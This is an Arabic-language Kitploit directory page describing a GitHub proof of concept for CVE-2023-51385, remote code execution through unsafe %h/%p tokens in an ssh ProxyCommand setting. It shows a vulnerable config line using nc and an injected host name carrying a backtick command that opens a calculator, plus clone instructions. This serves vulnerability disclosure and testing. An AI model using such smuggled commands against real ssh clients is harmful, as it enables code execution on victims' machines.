Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
poc-proxycommand-vulnerable — إثبات المفهوم لاستغلال إعدادات proxycommand الضعيفة على عملاء ssh (CVE-2023-51385) | Kitploit
أدوات/GitHubGitHub/vin01/poc-proxycommand-vulnerable
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةالقيادة والسيطرةأداة الوصول عن بعد
GitHubvin01/poc-proxycommand-vulnerable

poc-proxycommand-vulnerable

إثبات المفهوم لاستغلال إعدادات proxycommand الضعيفة على عملاء ssh (CVE-2023-51385)

عرض المستودع
5038منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

RCE عبر ~/.ssh/config غير الآمن

يُعد استخدام الرموز المميزة مثل %h و %p في ProxyCommand شائعًا جدًا لاستخدام الأنفاق وبروكسي الاتصالات عبر SSH.

الإعداد القابل للاستغلال

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

ملاحظة: في تقييمي الأولي كنت أعتقد أن استخدام '%h (علامات الاقتباس المفردة) قد يتجنب ذلك، لكن يبدو أنه لا يزال قابلاً للاستغلال بشيء مثل:

root@kitploit:~
url = ssh://'`open -aCalculator`'foo.example.com/bar

مأخوذ من: https://man.openbsd.org/ssh_config#ProxyCommand

ماذا يوجد في هذا المستودع

وحدة فرعية تستغل هذه الثغرة لإظهار آلة حاسبة على نظام OSX.

جرّب ذلك باستخدام:

git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules

أو

git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules

تنزيل الأداة